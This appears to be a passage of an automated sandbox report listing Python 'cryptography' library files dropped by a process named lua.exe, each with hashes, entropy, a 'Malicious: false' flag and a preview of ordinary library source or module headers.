Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils.from cryptography.exceptions import (. InvalidSignature,. UnsupportedAlgorithm,. _Reasons,.).from cryptography.hazmat.backends.openssl.utils import (. _calculate_digest_and_algorithm,. _check_not_prehashed,. _warn_sign_verify_deprecated,.).from cryptography.hazmat.primitives import hashes.from cryptography.hazmat.primitives.asymmetric import (. AsymmetricSignatureContext,. AsymmetricVerificationContext,. rsa,.).from cryptography.hazmat.primitives.asymmetric.padding import (. AsymmetricPadding,. MGF1,. OAEP,. PKCS1v15,. PSS,. calculate_max_pss_salt_length,.).from cryptography.hazmat.primitives.asymmetric.rsa import (. RSAPrivateKeyWithSerialization,. RSAPublicKeyW

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\utils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2348
Entropy (8bit):	4.798129793770834
Encrypted:	false
SSDEEP:	48:IDoWKzbxGrxcSRWLQRWWmW6RWZKsMneeRWPmgQHyCiLeXOfX/seXAr7lJZx:F/ztETRWsRW7W6RWzMneeRWegbmO/LXC
MD5:	63AA0FDB031F75EF3A54455C16DE3B0E
SHA1:	5707822B3D9D21C130D9B063A0EC0C8E7B84BEB2
SHA-256:	F893323A03A5A654962F9CD3BBFDFEBE5E7F804D4504ADDEC3A9F466CDF9418A
SHA-512:	BA2C6FB23483A9C45C4291C8324BFA6BEFE4D4207B6ECE451DAE851889E69DE6B80BE9D0D65583C87423AACBE8BB38745CD1E11543DDDBBB4732BFD367FDB0B4
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import warnings..from cryptography import utils.from cryptography.hazmat.primitives import hashes.from cryptography.hazmat.primitives.asymmetric.utils import Prehashed...def _evp_pkey_derive(backend, evp_pkey, peer_public_key):. ctx = backend._lib.EVP_PKEY_CTX_new(evp_pkey, backend._ffi.NULL). backend.openssl_assert(ctx != backend._ffi.NULL). ctx = backend._ffi.gc(ctx, backend._lib.EVP_PKEY_CTX_free). res = backend._lib.EVP_PKEY_derive_init(ctx). backend.openssl_assert(res == 1). res = backend._lib.EVP_PKEY_derive_set_peer(ctx, peer_public_key._evp_pkey). backend.openssl_assert(res == 1). keylen = backend._ffi.new("size_t *"). res = backend._lib.EVP_PKEY_derive(ctx, backend._ffi.NULL, keylen). backend.openssl_asse

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\x25519.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4488
Entropy (8bit):	4.632927165478198
Encrypted:	false
SSDEEP:	96:FZgTXrpF/fGgFrNF/Eho79zWGNL16yy6Nj/w:FZgbN9pFB9D79zZxpD9w
MD5:	B57B69A0C96D295537AB7894034354F9
SHA1:	9AE9246C686E6513769C3F08F13F034D4CE4B583
SHA-256:	F8C3403C64BF0D9DFBFAC9129F5EFE8086A414BA099AE371F0F942F2CDBED348
SHA-512:	8ED4401D4C06C48155B094C84C4EABDE53AD84AB1D61AEE3D9E8DDBF42352CEF3C7B7E3BB9287F8F7216665DB7BA722CCFB1A18AA7D9C4840EAAC077353821DA
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils.from cryptography.hazmat.backends.openssl.utils import _evp_pkey_derive.from cryptography.hazmat.primitives import serialization.from cryptography.hazmat.primitives.asymmetric.x25519 import (. X25519PrivateKey,. X25519PublicKey,.)..._X25519_KEY_SIZE = 32...@utils.register_interface(X25519PublicKey).class _X25519PublicKey(object):. def __init__(self, backend, evp_pkey):. self._backend = backend. self._evp_pkey = evp_pkey.. def public_bytes(self, encoding, format):. if (. encoding is serialization.Encoding.Raw. or format is serialization.PublicFormat.Raw. ):. if (. encoding is not serialization.Encoding.Raw. or fo

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\x448.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4011
Entropy (8bit):	4.665166442900023
Encrypted:	false
SSDEEP:	48:IDoW2gX1F/M2G3lAAkOQZmrZunZHnVF/dZunZH+WCdmozH2G3lA+ik5d9LZ6giZm:FZgX1F/fGgq8VF/dxBfzWGNL16nc
MD5:	F1FD49248460F72476A0EBF4F83D8727
SHA1:	7653B6A32EA05012210CB5F8ECD121196698F820
SHA-256:	E561F7470EE46462D2DC40C35738EB62B8801BEB73527C967ADCAA3184E21210
SHA-512:	DD4195C096CB57E5E366C4042B8FA97A6B1FFA6E9B50E238B20B7D6AFECC9E551BB19B261B3075C26CF1F10DA97513C454A93DC4F7596BB70C743EC0CA77656F
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import utils.from cryptography.hazmat.backends.openssl.utils import _evp_pkey_derive.from cryptography.hazmat.primitives import serialization.from cryptography.hazmat.primitives.asymmetric.x448 import (. X448PrivateKey,. X448PublicKey,.).._X448_KEY_SIZE = 56...@utils.register_interface(X448PublicKey).class _X448PublicKey(object):. def __init__(self, backend, evp_pkey):. self._backend = backend. self._evp_pkey = evp_pkey.. def public_bytes(self, encoding, format):. if (. encoding is serialization.Encoding.Raw. or format is serialization.PublicFormat.Raw. ):. if (. encoding is not serialization.Encoding.Raw. or format is not s

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\backends\openssl\x509.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21620
Entropy (8bit):	4.729523030510298
Encrypted:	false
SSDEEP:	384:F1FPmfQhOhbpXkC2Pli4CXQhvjBMAnuQtnXkAhcUywAM6Mu0wF:pmfQcVp0C2PleXQdBuQxX7ODwKMu0a
MD5:	33E4BA8337043D114CD5D62DCE84884D
SHA1:	9E36D20472E97B60906F5C498F4512DD395BF0A1
SHA-256:	10C37DA923D6D41559D5500E1F3822F283BC89D23C88E6F4C2B5A376BAF91692
SHA-512:	256B04E7805EB0C2EFA9A51A9CCA3CA414E1E029631733D8BC09C7D53A85CF7CCBB058C2B3DA0AEF2055CF020983BAA1FAA935CB11CCB28B7F4BDB6A7D202AB6
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import datetime.import operator..from cryptography import utils, x509.from cryptography.exceptions import UnsupportedAlgorithm.from cryptography.hazmat.backends.openssl.decode_asn1 import (. _asn1_integer_to_int,. _asn1_string_to_bytes,. _decode_x509_name,. _obj2txt,. _parse_asn1_time,.).from cryptography.hazmat.backends.openssl.encode_asn1 import (. _encode_asn1_int_gc,. _txt2obj_gc,.).from cryptography.hazmat.primitives import hashes, serialization.from cryptography.hazmat.primitives.asymmetric import dsa, ec, rsa.from cryptography.x509.name import _ASN1Type...@utils.register_interface(x509.Certificate).class _Certificate(object):. def __init__(self, backend, x509_cert):. self._backend = backend. self._x

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\bindings\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	246
Entropy (8bit):	4.510985100796869
Encrypted:	false
SSDEEP:	6:SbFpbtcMi6O0vgad8pq/ZOwA9lJuzDMABCR1SX5J:qD+6O0vgEVhO17yDjCy5J
MD5:	78B1D25DDD78A95B7C555457C908A5D9
SHA1:	20AB628BD54B5F04CAAE086D3C731DC028F65619
SHA-256:	D301B0D8E17D47B7C75FB35610D0A6AEC62281B5C7536A23827F8DE11923B3D5
SHA-512:	F8191CB9DD1ECC0E97A7A87B233BFC583C29BE5BC1EF8D432AD35BC1703209D0FDFBEB38DF5EFA552E177DB9C316F34FAA4FEB334141EA850A45923B07E4AF4F
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\bindings\_openssl.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2296320
Entropy (8bit):	6.963761793623149
Encrypted:	false
SSDEEP:	49152:OZOg3qT51HaQ8SG8hoqWPzaRYBkI3rOkCaKk:OZOgaT5BlG5qwaRYBkI
MD5:	9AF9CA9B592687B0A2BA60934DD9BD1B
SHA1:	126E765964496FFE94C1A103477BA58A71F03487
SHA-256:	0CD6D615C463C7D56D1FD262BA1C46FE7B18188D805B38FF60E965A9913DAA33
SHA-512:	B075982E9B874B787643EA281CB5614CDCAAEACCD18C107776B77C0E76F53D6B80603D741057F7FFBA5218CF217336F81FCBC5791312ACCA3D92148B9175B72E
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......s...7..Q7..Q7..Q>./Q#..Q..P5..Q..P;..Q..P=..Q..P=..Q..P5..Q#.P:..Q7..Q...Q7..Q"..Q..P...Q..P6..Q..P6..Q..CQ6..Q..P6..QRich7..Q........................PE..L......_...........!.........T......Y........................................p#...........@........................... .P...@. .h....."......................."..]... ............................... .@............................................text............................... ..`.rdata..............................@..@.data....S.... ..$.... .............@....rsrc.........".......!.............@..@.reloc...]...."..^....!.............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\bindings\_padding.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	5.5689561743456295
Encrypted:	false
SSDEEP:	192:hsFlEoafmQwQa+c+0OU28jO94TGoMkwcm7zDPEfcu:ocUQaJOQjm4ioMkwXrPE
MD5:	F1633EBE3843661FCC08D2A8AD9E89DD
SHA1:	D1C51DA2F474954A6B1960818E68EC344E69776F
SHA-256:	50F572C2A38D2E95950D7112DA1CE2FCABC9CDFF9257F3982C8DA7F1BDF7BEAB
SHA-512:	1F36B8173860DCA7ED2C0D25175E913CE991EF38D666E00F4EDA6D2E911F26558D09D9601B5F4AC1F74A6BA462B3BCEC05405FF54B85D1C6EA88D91903C160A2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~T...:...:...:..g....:.On;...:..t;...:.On?...:.On>...:.On9...:.Fn;...:...;...:.gm2...:.gm:...:.gm....:.gm8...:.Rich..:.........PE..L......_...........!................Q........0...............................p............@..........................5..P...`5..d....P.......................`......01..............................P1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc.......`.......(..............@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\bindings\openssl\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	246
Entropy (8bit):	4.510985100796869
Encrypted:	false
SSDEEP:	6:SbFpbtcMi6O0vgad8pq/ZOwA9lJuzDMABCR1SX5J:qD+6O0vgEVhO17yDjCy5J
MD5:	78B1D25DDD78A95B7C555457C908A5D9
SHA1:	20AB628BD54B5F04CAAE086D3C731DC028F65619
SHA-256:	D301B0D8E17D47B7C75FB35610D0A6AEC62281B5C7536A23827F8DE11923B3D5
SHA-512:	F8191CB9DD1ECC0E97A7A87B233BFC583C29BE5BC1EF8D432AD35BC1703209D0FDFBEB38DF5EFA552E177DB9C316F34FAA4FEB334141EA850A45923B07E4AF4F
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\bindings\openssl\_conditional.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8291
Entropy (8bit):	5.007707711930194
Encrypted:	false
SSDEEP:	192:F0wuWEDI7CbRzcHCuOwZ8SpaFGWKey/mEIDJUhRFvz0KvUdW9dDQ/1k8N1:FAEV0U6Mg9N1
MD5:	3E3B3C1C5D9DDA50504091DDF2B9F177
SHA1:	2526F185A800CDCAC57C4F7DA470F21EBEF87599
SHA-256:	EBE130A59792A9B2CD44F873B1714F4CEE3DF302C66835D6F8BBE4AA2266E2F4
SHA-512:	855EC98B52D2F5A2E0A1367712E0EA92ED3F3D18C25EBC8E56A3D8C6608B29254F7A88CEF9487D2BB2BF7DF40F307381C038FFF2429DF0CEF1D9D6BEB6548423
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function...def cryptography_has_ec2m():. return [. "EC_POINT_set_affine_coordinates_GF2m",. "EC_POINT_get_affine_coordinates_GF2m",. "EC_POINT_set_compressed_coordinates_GF2m",. ]...def cryptography_has_rsa_oaep_md():. return [. "EVP_PKEY_CTX_set_rsa_oaep_md",. ]...def cryptography_has_rsa_oaep_label():. return [. "EVP_PKEY_CTX_set0_rsa_oaep_label",. ]...def cryptography_has_ssl3_method():. return [. "SSLv3_method",. "SSLv3_client_method",. "SSLv3_server_method",. ]...def cryptography_has_102_verification():. return [. "X509_V_ERR_SUITE_B_INVALID_VERSION",. "X509_V_ERR_SUITE_B_INVALID_ALGORITHM",. "X509_V_ERR_SUITE_B_INVALID_CURVE",. "X509_V_ER

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\bindings\openssl\binding.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5816
Entropy (8bit):	4.6021178640154545
Encrypted:	false
SSDEEP:	96:FYwxYuaEV9ghLh0/NQPu0RYFsp17I5/fE5Pc/CTBpK3GL5iXv:FLH9+hEKu0RmsTw0iaTBnI
MD5:	2AE98A0C48D66B58FE7CD6203BF8CE48
SHA1:	DCC4DBC790101C5FBDABFF59732B9C06770DFA3F
SHA-256:	C93E5ED89AF300D77A146FFFBACE9A8FDA1C6F8F049CD24AEB570AC2BA5E334F
SHA-512:	7C871A9972014FF8C820377A5E284A0C3959036C59D8DFDBA1BCCDB3407D3758D1D1F7682FA0C4AC13FBE93E6F5D6C3F4AE18634A0F046A9BABFF335285E1040
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import collections.import threading.import types..import cryptography.from cryptography import utils.from cryptography.exceptions import InternalError.from cryptography.hazmat.bindings._openssl import ffi, lib.from cryptography.hazmat.bindings.openssl._conditional import CONDITIONAL_NAMES.._OpenSSLErrorWithText = collections.namedtuple(. "_OpenSSLErrorWithText", ["code", "lib", "func", "reason", "reason_text"].)...class _OpenSSLError(object):. def __init__(self, code, lib, func, reason):. self._code = code. self._lib = lib. self._func = func. self._reason = reason.. def _lib_reason_match(self, lib, reason):. return lib == self.lib and reason == self.reason.. code = utils.read_only_property("_code"

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	246
Entropy (8bit):	4.510985100796869
Encrypted:	false
SSDEEP:	6:SbFpbtcMi6O0vgad8pq/ZOwA9lJuzDMABCR1SX5J:qD+6O0vgEVhO17yDjCy5J
MD5:	78B1D25DDD78A95B7C555457C908A5D9
SHA1:	20AB628BD54B5F04CAAE086D3C731DC028F65619
SHA-256:	D301B0D8E17D47B7C75FB35610D0A6AEC62281B5C7536A23827F8DE11923B3D5
SHA-512:	F8191CB9DD1ECC0E97A7A87B233BFC583C29BE5BC1EF8D432AD35BC1703209D0FDFBEB38DF5EFA552E177DB9C316F34FAA4FEB334141EA850A45923B07E4AF4F
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\asymmetric\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1020
Entropy (8bit):	4.496772296141767
Encrypted:	false
SSDEEP:	24:q9O0opQ24tT/ZnM7cnfnq/N7cRL71KQeC:IDoWB1ZM7cfnCN7cJ1KQP
MD5:	04E48263DF76D83B359AE96DC04E0D97
SHA1:	76F2A7F1F95F8D479BA440B42ACB2A4FDF766B27
SHA-256:	5A1527DED1B1A0B031180B191C4949D9A3882D74A1E790198B4E0C06E7589900
SHA-512:	8C9A5276E6B0BB0D52A921DF826605733CE0740F878669D8BBEEEE8E3B738D9B0C3D754BCF31B1632F6CB13D4D8E2DD5DF9F678CEBAAAAA639CA3EBE351B7AF7
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six...@six.add_metaclass(abc.ABCMeta).class AsymmetricSignatureContext(object):. @abc.abstractmethod. def update(self, data):. """. Processes the provided bytes and returns nothing.. """.. @abc.abstractmethod. def finalize(self):. """. Returns the signature as bytes.. """...@six.add_metaclass(abc.ABCMeta).class AsymmetricVerificationContext(object):. @abc.abstractmethod. def update(self, data):. """. Processes the provided bytes and returns nothing.. """.. @abc.abstractmethod. def verify(self):. """. Raises an exception if the bytes provided to update do not match the. signature or the signature does not match the publ

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\asymmetric\dh.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5859
Entropy (8bit):	4.551418097621148
Encrypted:	false
SSDEEP:	96:F9mA44FAX4/G4Ecrv64rWnGvJ4mqyUh8AiXM2zwrcdFl3rHx:F971+X+G4Ep+Wqyxh8A1rCFFrR
MD5:	21C4746EF0F32080AF9005FF08CA08C7
SHA1:	12AA7DA9AD635AC9FD1DADD08F283D9935596DFF
SHA-256:	92EC8F71C70B78E632E0EB8691E804CAA312CD1A3E4328E5530E3ADE3CDFAC6B
SHA-512:	44777DE8294BFA96995D0AF4CA77F5BF4C56C1343424DBC1BA2EED180B748AB0D2AA9166C8DA6034B5C14A4C238302C13D96A8AEC0144D9FCA03C6CC5A7A2BF4
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six..from cryptography import utils.from cryptography.hazmat.backends import _get_backend..._MIN_MODULUS_SIZE = 512...def generate_parameters(generator, key_size, backend=None):. backend = _get_backend(backend). return backend.generate_dh_parameters(generator, key_size)...class DHPrivateNumbers(object):. def __init__(self, x, public_numbers):. if not isinstance(x, six.integer_types):. raise TypeError("x must be an integer.").. if not isinstance(public_numbers, DHPublicNumbers):. raise TypeError(. "public_numbers must be an instance of " "DHPublicNumbers.". ).. self._x = x. self._public_numbers = public_numbers.. def __eq__(self, other):.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\asymmetric\dsa.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7181
Entropy (8bit):	4.618004427723687
Encrypted:	false
SSDEEP:	192:F9IrItLrz1N11TXheid+PTq3WWf6Ku2UPX:F2rItLrz71VReid+Tq3Ff6Ku2U
MD5:	D0C77CC36BC4EF7530C2C31575C2A854
SHA1:	3F1D7E193E9F10F673262C2F1596696873705DA1
SHA-256:	5EE1369945E5F9F5E2DAAEF0DB6A8ACA2093154CFEF39D9C153C15E16394420C
SHA-512:	F130AF8ED08BC20B5451D805D33ACA1B3772EBD250D7D8C24BACECAF81FAEE12C02C71A27C9E5380178145FF0ADFBDA977F9EE7E0AB882344558B299C8468C06
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six..from cryptography import utils.from cryptography.hazmat.backends import _get_backend...@six.add_metaclass(abc.ABCMeta).class DSAParameters(object):. @abc.abstractmethod. def generate_private_key(self):. """. Generates and returns a DSAPrivateKey.. """...@six.add_metaclass(abc.ABCMeta).class DSAParametersWithNumbers(DSAParameters):. @abc.abstractmethod. def parameter_numbers(self):. """. Returns a DSAParameterNumbers.. """...@six.add_metaclass(abc.ABCMeta).class DSAPrivateKey(object):. @abc.abstractproperty. def key_size(self):. """. The bit length of the prime modulus.. """.. @abc.abstractmethod. def public_key(self):. """.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\asymmetric\ec.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14006
Entropy (8bit):	4.959520714608183
Encrypted:	false
SSDEEP:	384:FzewZg8AeSnrzQXJYVFYunqH+qxBNsS7JUd3U/MeQA6n9CW34TwS6FDGU5vFI1Ac:DSrk5GqiyLfu+atgRT8joxE5FXEdD
MD5:	7351B0C71A55BE2C058153FEB70445AA
SHA1:	16A2A7477DE29C63F30BAE26403AEBC2C8D89437
SHA-256:	DABA2B9481171C690B9C8F1B6DE14A311AFE8097C48A9B898A0403421E3193BC
SHA-512:	E145B7E9F3DA85E6547B9DC300028CF4C9C06AC353C6E8167E19C7A7A960A72FB9AE739E1CF73040F4891DBEF29FBF51D8AC8A2B78C6277B4E738ADEF7C9E531
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc.import warnings..import six..from cryptography import utils.from cryptography.hazmat._oid import ObjectIdentifier.from cryptography.hazmat.backends import _get_backend...class EllipticCurveOID(object):. SECP192R1 = ObjectIdentifier("1.2.840.10045.3.1.1"). SECP224R1 = ObjectIdentifier("1.3.132.0.33"). SECP256K1 = ObjectIdentifier("1.3.132.0.10"). SECP256R1 = ObjectIdentifier("1.2.840.10045.3.1.7"). SECP384R1 = ObjectIdentifier("1.3.132.0.34"). SECP521R1 = ObjectIdentifier("1.3.132.0.35"). BRAINPOOLP256R1 = ObjectIdentifier("1.3.36.3.3.2.8.1.1.7"). BRAINPOOLP384R1 = ObjectIdentifier("1.3.36.3.3.2.8.1.1.11"). BRAINPOOLP512R1 = ObjectIdentifier("1.3.36.3.3.2.8.1.1.13"). SECT163K1 = ObjectIdentifier("1.3.132

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\asymmetric\ed25519.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2401
Entropy (8bit):	4.779580993238801
Encrypted:	false
SSDEEP:	24:q9O0opQ24t6GH9CiNrgo7REv6NgJKRGNnPvCDY4Ego7REv6Ng1Lgo7REv6NgJKk4:IDoWBBASknWLRKPKXRnWNnWLQVq9z
MD5:	80E1F058AD92690069AEF79D492D91E8
SHA1:	0C2390E2E05B4BED67146071AAA14F8729F5B2F9
SHA-256:	ADF2265101FE3DC4E58AEC6217CEB8692C30EDD402595C198233CF6C35E21A52
SHA-512:	E1778C069F5864EB5E4BA1FE55FFBA2BDCC2E35B60AFE92EC16329D45A26D832F860057BA1B65A7BFC30129A795916B672DFAB3BE5B2F3FD0A6134A6C07E5812
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six..from cryptography.exceptions import UnsupportedAlgorithm, _Reasons..._ED25519_KEY_SIZE = 32._ED25519_SIG_SIZE = 64...@six.add_metaclass(abc.ABCMeta).class Ed25519PublicKey(object):. @classmethod. def from_public_bytes(cls, data):. from cryptography.hazmat.backends.openssl.backend import backend.. if not backend.ed25519_supported():. raise UnsupportedAlgorithm(. "ed25519 is not supported by this version of OpenSSL.",. _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM,. ).. return backend.ed25519_load_public_bytes(data).. @abc.abstractmethod. def public_bytes(self, encoding, format):. """. The serialized bytes of the public key..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\asymmetric\ed448.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2328
Entropy (8bit):	4.684145209832676
Encrypted:	false
SSDEEP:	24:q9O0opQ24t6G6xrgoPEvYNHGNnPvCDy4EgoPEvYNYLgoPEvYNGHBT1FzdmB0NlFc:IDoWBOk50HKPKVR50Z50Ap9U
MD5:	2F4A77E18C07B6A0E8E9614F4EA0EE2B
SHA1:	5BBFA02BCF2C6ED4A865E4C2080D9392410B171E
SHA-256:	272AC41F0605FC5B63FC4EB4B7E1A6BE6DC21A7412C556DAB29B59056F387819
SHA-512:	32C27C896EC24CB913B6FDFF5216B32D2A8322DA4FEC57DDF7F15DDABBCEFA2F7E6541173D481D66994E94EAD34C92E25582FBA16B0C2F01013B3D9694A28962
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six..from cryptography.exceptions import UnsupportedAlgorithm, _Reasons...@six.add_metaclass(abc.ABCMeta).class Ed448PublicKey(object):. @classmethod. def from_public_bytes(cls, data):. from cryptography.hazmat.backends.openssl.backend import backend.. if not backend.ed448_supported():. raise UnsupportedAlgorithm(. "ed448 is not supported by this version of OpenSSL.",. _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM,. ).. return backend.ed448_load_public_bytes(data).. @abc.abstractmethod. def public_bytes(self, encoding, format):. """. The serialized bytes of the public key.. """.. @abc.abstractmethod. def verify(self, s

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\asymmetric\padding.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2250
Entropy (8bit):	4.81993459565317
Encrypted:	false
SSDEEP:	48:IDoWBgY9h/Q8a8zQlwITsXOgRDQeCiPDG0lCiPDG5qoCjxWwlL9f6V:F9Shon8zhOgRDDA8HJ8V
MD5:	63C708BD8011CBC76DA2B9AB9C23ACFB
SHA1:	BFA28EC0C0049395F8417DDCBA4FC02A7F9C003A
SHA-256:	DA93EA06EE1D18446D14F1E73D14D9D2244EFD763D86BF514F095372BFC9E5BC
SHA-512:	851FC9D9DC6B721DD4869527E339F35D0AB86C4ED9A92BBB280D51E06532207FD3C9A09D35380A83C19153DB3EEA3745CFABC1AA1E3A4AC44BC6BBFF949D82BA
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six..from cryptography import utils.from cryptography.hazmat.primitives import hashes.from cryptography.hazmat.primitives.asymmetric import rsa...@six.add_metaclass(abc.ABCMeta).class AsymmetricPadding(object):. @abc.abstractproperty. def name(self):. """. A string naming this padding (e.g. "PSS", "PKCS1").. """...@utils.register_interface(AsymmetricPadding).class PKCS1v15(object):. name = "EMSA-PKCS1-v1_5"...@utils.register_interface(AsymmetricPadding).class PSS(object):. MAX_LENGTH = object(). name = "EMSA-PSS".. def __init__(self, mgf, salt_length):. self._mgf = mgf.. if (. not isinstance(salt_length, six.integer_types). and salt_length is not self

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\asymmetric\rsa.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10672
Entropy (8bit):	4.6125971324204045
Encrypted:	false
SSDEEP:	192:F0cbLRBquLJG1bb9dr5BuEj8zscyvdpc3RxcmIfrbxw2ivqDiL7EqfU0tKZr0nqP:FxbLRBquLJ4bx15BHDgQxw23DiL7EqfE
MD5:	F3E936BB0991F1797C441EF4D97AFCD8
SHA1:	8EAA82099640B8F3CFCD364369B3816F96910671
SHA-256:	320C5D900F0F5A55C6B7694C3E99D5F50618BD09D84C58DBD11B494438E795F5
SHA-512:	EAC8C8EDCAED3AF8CF8B78D44FF5F98B22135DAD681E49381C36199A8D4E2A557128DD68D0902713F9AA67B111A34E04FA636BDCF081222A687501840F792BBE
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..try:. # Only available in math in 3.5+. from math import gcd.except ImportError:. from fractions import gcd..import six..from cryptography import utils.from cryptography.exceptions import UnsupportedAlgorithm, _Reasons.from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import RSABackend...@six.add_metaclass(abc.ABCMeta).class RSAPrivateKey(object):. @abc.abstractmethod. def signer(self, padding, algorithm):. """. Returns an AsymmetricSignatureContext used for signing data.. """.. @abc.abstractmethod. def decrypt(self, ciphertext, padding):. """. Decrypts the provided ciphertext.. """.. @abc.abstractproperty. def key_

